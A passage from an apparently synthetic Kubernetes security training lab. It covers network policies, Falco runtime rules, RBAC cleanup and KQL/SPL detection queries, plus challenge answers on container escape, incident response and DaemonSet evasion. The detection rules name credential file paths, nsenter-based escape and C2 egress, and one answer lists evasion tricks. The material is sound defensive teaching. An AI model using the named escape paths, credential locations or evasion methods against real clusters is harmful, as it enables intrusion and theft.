# Allow only frontend → backend traffic on port 8080 (SYNTHETIC)
apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
name: allow-frontend-to-backend
namespace: backend
spec:
podSelector:
matchLabels:
app: api-server
policyTypes:
- Ingress
ingress:
- from:
- namespaceSelector:
matchLabels:
kubernetes.io/metadata.name: frontend
podSelector:
matchLabels:
app: webapp
ports:
- protocol: TCP
port: 8080
---
# Block all egress to external IPs (prevent C2 callbacks) (SYNTHETIC)
apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
name: block-external-egress
namespace: kube-system
spec:
podSelector: {}
policyTypes:
- Egress
egress:
- to:
- ipBlock:
cidr: 10.50.0.0/16
ports:
- protocol: TCP
port: 6443
- protocol: TCP
port: 53
- protocol: UDP
port: 53
Step 5.3: Deploy Falco Runtime Detection¶
# Falco rules for Kubernetes attack detection (SYNTHETIC)
# Save as /etc/falco/rules.d/k8s-attack-defense.yaml
- rule: Privileged Container Started
desc: Detect when a privileged container is started
condition: >
container_started and container and container.privileged=true
output: >
Privileged container started (user=%user.name container=%container.id
image=%container.image.repository pod=%k8s.pod.name ns=%k8s.ns.name)
priority: CRITICAL
tags: [container, cis, mitre_privilege_escalation, T1611]
- rule: Read Sensitive File in Container
desc: Detect read of sensitive files (kubelet certs, service account tokens)
condition: >
open_read and container and
(fd.name startswith /var/lib/kubelet/pki or
fd.name startswith /var/run/secrets/kubernetes.io or
fd.name startswith /etc/kubernetes/pki)
output: >
Sensitive file read in container (user=%user.name file=%fd.name
container=%container.id pod=%k8s.pod.name ns=%k8s.ns.name)
priority: WARNING
tags: [container, filesystem, mitre_credential_access, T1552.001]
- rule: Outbound Connection to Non-RFC1918
desc: Detect pod making outbound connections to public IPs (potential C2)
condition: >
outbound and container and
not (fd.sip.name startswith "10." or fd.sip.name startswith "172.16." or
fd.sip.name startswith "192.168.")
output: >
Outbound connection to public IP from container (command=%proc.cmdline
dest=%fd.sip:%fd.sport container=%container.id pod=%k8s.pod.name
ns=%k8s.ns.name image=%container.image.repository)
priority: WARNING
tags: [container, network, mitre_command_and_control, T1071]
Step 5.4: Fix RBAC Misconfigurations¶
# Remove overly permissive ClusterRoleBinding (SYNTHETIC)
$ kubectl delete clusterrolebinding monitor-cluster-wide
clusterrolebinding.rbac.authorization.k8s.io "monitor-cluster-wide" deleted
# Create a scoped Role for monitoring (SYNTHETIC)
$ cat <<EOF | kubectl apply -f -
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
name: monitoring-read-only
rules:
- apiGroups: [""]
resources: ["pods", "nodes", "services", "endpoints"]
verbs: ["get", "list", "watch"]
- apiGroups: ["apps"]
resources: ["deployments", "replicasets", "daemonsets"]
verbs: ["get", "list", "watch"]
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRoleBinding
metadata:
name: monitoring-read-only-binding
subjects:
- kind: ServiceAccount
name: monitor-sa
namespace: monitoring
roleRef:
kind: ClusterRole
name: monitoring-read-only
apiGroup: rbac.authorization.k8s.io
EOF
clusterrole.rbac.authorization.k8s.io/monitoring-read-only created
clusterrolebinding.rbac.authorization.k8s.io/monitoring-read-only-binding created
# Remove the backdoor (SYNTHETIC)
$ kubectl delete clusterrolebinding emergency-access-binding
$ kubectl delete serviceaccount backdoor-sa -n kube-system
$ kubectl delete daemonset node-monitor-agent -n kube-system
$ kubectl delete cronjob log-rotation-job -n kube-system
Phase 6: Detection Engineering — Comprehensive Query Library¶
Objective¶
Build a complete detection library covering every attack phase with both KQL and SPL queries.
Detection Matrix¶
| Phase | Attack Technique | MITRE ATT&CK | KQL | SPL |
|---|---|---|---|---|
| Recon | API enumeration from pod | T1613 | ||
| Recon | RBAC discovery | T1069 | ||
| PrivEsc | nsenter container escape | T1611 | ||
| PrivEsc | Kubelet credential harvest | T1552.001 | ||
| Lateral | ClusterRoleBinding abuse | T1078.004 | ||
| Lateral | Cross-namespace secret access | T1552.007 | ||
| Persist | Malicious DaemonSet | T1053.007 | ||
| Persist | CronJob backdoor | T1053.003 | ||
| Persist | Backdoor service account | T1136.001 | ||
| C2 | Outbound beaconing from pod | T1071.001 |
Step 6.1: Unified KQL Detection Rule Pack¶
// === KUBERNETES ATTACK DETECTION — UNIFIED KQL RULE PACK === (SYNTHETIC)
// Rule 1: Container Escape Indicators
// Detects nsenter, chroot, or mount namespace manipulation
DeviceProcessEvents
| where FileName in ("nsenter", "chroot", "unshare")
| where ProcessCommandLine has_any ("--target", "--mount", "--pid", "--net")
| extend AlertName = "Kubernetes Container Escape Attempt"
| extend MitreTechnique = "T1611"
| project Timestamp, DeviceName, AccountName, ProcessCommandLine,
AlertName, MitreTechnique
// Rule 2: Suspicious kubectl Exec Into Pod
// Detects interactive shells spawned inside pods
AzureDiagnostics
| where Category == "kube-audit"
| extend verb = tostring(parse_json(log_s).verb)
| extend subresource = tostring(parse_json(log_s).objectRef.subresource)
| extend user = tostring(parse_json(log_s).user.username)
| extend podName = tostring(parse_json(log_s).objectRef.name)
| extend namespace = tostring(parse_json(log_s).objectRef.namespace)
| where subresource == "exec" and verb == "create"
| project TimeGenerated, user, podName, namespace
// Rule 3: Token Generation for Service Account
// Detects long-lived token creation (persistence indicator)
AzureDiagnostics
| where Category == "kube-audit"
| extend verb = tostring(parse_json(log_s).verb)
| extend resource = tostring(parse_json(log_s).objectRef.resource)
| extend subresource = tostring(parse_json(log_s).objectRef.subresource)
| extend user = tostring(parse_json(log_s).user.username)
| where resource == "serviceaccounts" and subresource == "token" and verb == "create"
| project TimeGenerated, user, resource, subresource
Step 6.2: Unified SPL Detection Rule Pack¶
// === KUBERNETES ATTACK DETECTION — UNIFIED SPL RULE PACK === (SYNTHETIC)
// Rule 1: Container Escape Indicators
index=linux sourcetype=syslog OR sourcetype=falco
| search process_name IN ("nsenter", "chroot", "unshare")
| search cmdline="*--target*" OR cmdline="*--mount*" OR cmdline="*--pid*"
| eval alert_name="Kubernetes Container Escape Attempt"
| eval mitre_technique="T1611"
| table _time host user process_name cmdline alert_name mitre_technique
// Rule 2: Suspicious kubectl Exec Into Pod
index=kubernetes sourcetype="kube:apiserver-audit"
| spath input=log "verb" output=verb
| spath input=log "objectRef.subresource" output=subresource
| spath input=log "user.username" output=user
| spath input=log "objectRef.name" output=podName
| spath input=log "objectRef.namespace" output=namespace
| search subresource="exec" verb="create"
| table _time user podName namespace
// Rule 3: Token Generation for Service Account
index=kubernetes sourcetype="kube:apiserver-audit"
| spath input=log "verb" output=verb
| spath input=log "objectRef.resource" output=resource
| spath input=log "objectRef.subresource" output=subresource
| spath input=log "user.username" output=user
| search resource="serviceaccounts" subresource="token" verb="create"
| table _time user resource subresource
Challenge Questions¶
Challenge 1: Why is privileged: true Dangerous?
Explain why a privileged container is functionally equivalent to root on the host. What Linux kernel capabilities does it inherit, and how does this enable container escape?
Answer
A privileged container runs with all Linux capabilities (CAP_SYS_ADMIN, CAP_NET_ADMIN, CAP_SYS_PTRACE, etc.), disables seccomp and AppArmor profiles, and can access all host devices. With CAP_SYS_ADMIN, the container can use nsenter to enter the host's PID and mount namespaces, effectively becoming root on the node. Combined with a hostPath volume mounting /, the container has full read/write access to the host filesystem — including kubelet credentials, other container runtimes, and SSH keys.
Challenge 2: How Would You Detect This Attack Without Falco?
If your organization does not use Falco, what alternative detection methods could you deploy to catch container escape and lateral movement?
Answer
Alternatives include: (1) Kubernetes audit logging at RequestResponse level to capture all API calls including secret reads, exec into pods, and RBAC changes; (2) eBPF-based tools like Tetragon or Tracee that hook into kernel syscalls to detect namespace manipulation; (3) Syslog monitoring on nodes for nsenter/chroot processes; (4) Cloud-native tools like Defender for Containers (Azure), GuardDuty for EKS (AWS), or Security Command Center (GCP); (5) Network flow monitoring to detect unexpected cross-namespace or external traffic.
Challenge 3: RBAC Least Privilege Design
The monitor-sa service account was bound to cluster-admin. Design an RBAC policy that gives monitoring the minimum permissions needed (read pods, nodes, metrics) without granting access to secrets or workload mutation.
Answer
Create a custom ClusterRole with only get, list, watch on pods, nodes, services, endpoints, and pods/log. For metrics, grant access to the metrics.k8s.io API group. Explicitly exclude secrets, configmaps with sensitive data, and all write verbs (create, update, patch, delete). Bind using a ClusterRoleBinding (since monitoring needs cross-namespace read). Disable automountServiceAccountToken on all pods in the monitoring namespace that do not actually need API access.
Challenge 4: DaemonSet Detection Evasion
The malicious DaemonSet was named node-monitor-agent to blend in. What additional techniques could an attacker use to make the DaemonSet harder to detect, and how would you counter each one?
Answer
Evasion techniques include: (1) Using the same labels as legitimate system components (counter: maintain a CMDB/baseline of expected workloads and diff against it); (2) Deploying to a newly created namespace with a system-sounding name (counter: alert on namespace creation); (3) Using an image tag that matches existing images but from a different registry (counter: image allowlisting via admission controller); (4) Setting the DaemonSet owner reference to appear managed by a legitimate controller (counter: audit trail shows creation actor); (5) Using init containers for one-time execution then self-deleting (counter: audit log captures creation events regardless of pod lifecycle).
Challenge 5: Incident Response — Full Cluster Compromise
You have confirmed an attacker completed all phases of this lab in your production cluster. Write a 5-step incident response plan to contain, eradicate, and recover from this compromise.
Answer
- Contain: Immediately rotate the compromised service account tokens, delete unauthorized ClusterRoleBindings (
emergency-access-binding,monitor-cluster-wide), and apply NetworkPolicies to block all egress to external IPs from kube-system. 2. Identify: Query audit logs for all actions by the compromised identities (webapp-sa, monitor-sa, backdoor-sa) — build a full timeline of accessed resources. 3. Eradicate: Delete the malicious DaemonSet, CronJob, and backdoor service account. Scan all nodes for persistent rootkits or SSH keys dropped via the host mount. Rebuild affected nodes from clean images. 4. Recover: Rotate ALL secrets cluster-wide (database passwords, TLS certs, API keys). Re-deploy workloads from trusted CI/CD pipeline. Enable Pod Security Standards on all namespaces. 5. Lessons Learned: Implement admission controllers to block privileged pods, enforce RBAC review process, deploy Falco or equivalent runtime detection, enable audit logging at RequestResponse level.
ATT&CK Technique Mapping¶
| ATT&CK ID | Technique | Phase | Detection Method |
|---|---|---|---|
| T1613 | Container and Resource Discovery | Phase 1 | API audit log enumeration patterns |
| T1069 | Permission Groups Discovery | Phase 1 | RBAC query monitoring |
| T1611 | Escape to Host | Phase 2 | nsenter/chroot process detection |
| T1552.001 | Credentials in Files | Phase 2 | Kubelet cert file access monitoring |
| T1078.004 | Valid Accounts: Cloud Accounts | Phase 3 | ClusterRoleBinding abuse detection |
| T1552.007 | Container API | Phase 3 | Cross-namespace secret access patterns |
| T1053.007 | Container Orchestration Job | Phase 4 | DaemonSet creation in kube-system |
| T1053.003 | Cron | Phase 4 | CronJob creation monitoring |
| T1136.001 | Create Account: Local Account | Phase 4 | ServiceAccount creation + privilege binding |
| T1071.001 | Application Layer Protocol | Phase 4 | Outbound HTTP from system pods |
Security Controls Implemented¶
| Category | Before | After |
|---|---|---|
| Pod Security | No restrictions (privileged allowed) | Pod Security Standards restricted on all app namespaces |
| RBAC | cluster-admin bound to monitor-sa | Least-privilege read-only ClusterRole for monitoring |
| Network Policies | None (all pods communicate freely) | Default deny + explicit allow rules per namespace |
| Runtime Detection | None | Falco with custom rules for escape, C2, and privilege escalation |
| Secrets Management | Plaintext in etcd, native K8s secrets | etcd encryption at rest + external secret manager |
| Container Images | Any registry allowed | Image allowlisting via admission controller |
| Audit Logging | Minimal (metadata only) | RequestResponse level for secrets, RBAC, workloads |
| Service Account Tokens | Long-lived, auto-mounted | Short-lived, automount disabled where not needed |
Additional Resources¶
Cross-References¶
- Chapter 46: Cloud & Container Red Teaming — container attack methodology and cloud-native offensive security
- Chapter 20: Cloud Attack & Defense — cloud security fundamentals, shared responsibility, and defense patterns
- Lab 21: Cloud Container Security — foundational container security hardening lab
- Lab 26: Container & K8s Red Team — complementary container red team exercises
- Scenario SC-085: Kubernetes RBAC Abuse — incident response scenario for RBAC exploitation
- ATT&CK Technique Reference — detection queries mapped to ATT&CK techniques
- Chapter 5: Detection Engineering at Scale — building detection pipelines, KQL/SPL query optimization
External Resources¶
- MITRE ATT&CK — Containers Matrix — ATT&CK techniques specific to container environments
- Kubernetes Pod Security Standards — official K8s pod security documentation
- Falco — Cloud Native Runtime Security — Falco rules and deployment guide
- CIS Kubernetes Benchmark — CIS hardening guidance for Kubernetes
- OWASP Kubernetes Security Cheat Sheet — OWASP K8s security reference
- Kubernetes RBAC Good Practices — official RBAC hardening guidance
CWE References¶
| CWE | Name | Phase |
|---|---|---|
| CWE-250 | Execution with Unnecessary Privileges | Phase 2 (privileged pod) |
| CWE-269 | Improper Privilege Management | Phase 3 (cluster-admin to monitor-sa) |
| CWE-284 | Improper Access Control | Phase 3 (cross-namespace secret access) |
| CWE-522 | Insufficiently Protected Credentials | Phase 3 (secrets in plaintext etcd) |
| CWE-732 | Incorrect Permission Assignment for Critical Resource | Phase 1 (overly broad RBAC) |
| CWE-912 | Hidden Functionality | Phase 4 (disguised DaemonSet and CronJob) |
Advance Your Career¶
Recommended Certifications
This lab covers objectives tested in the following certifications. Investing in these credentials validates your Kubernetes and container security expertise:
| Certification | Focus | Link |
|---|---|---|
| CKS — Certified Kubernetes Security Specialist | Cluster hardening, supply chain security, runtime detection, network policies, Pod Security Standards | Learn More |
| CKA — Certified Kubernetes Administrator | Cluster architecture, workload management, networking, storage, RBAC, troubleshooting | Learn More |
| CompTIA Security+ (SY0-701) | Cloud and container security concepts, security operations, incident response | Learn More |
| CompTIA CySA+ (CS0-003) | Security operations, detection engineering, vulnerability management, incident response | Learn More |
| SC-200 — Microsoft Security Operations Analyst | KQL detection queries, Defender for Containers, Sentinel analytics for cloud workloads | Learn More |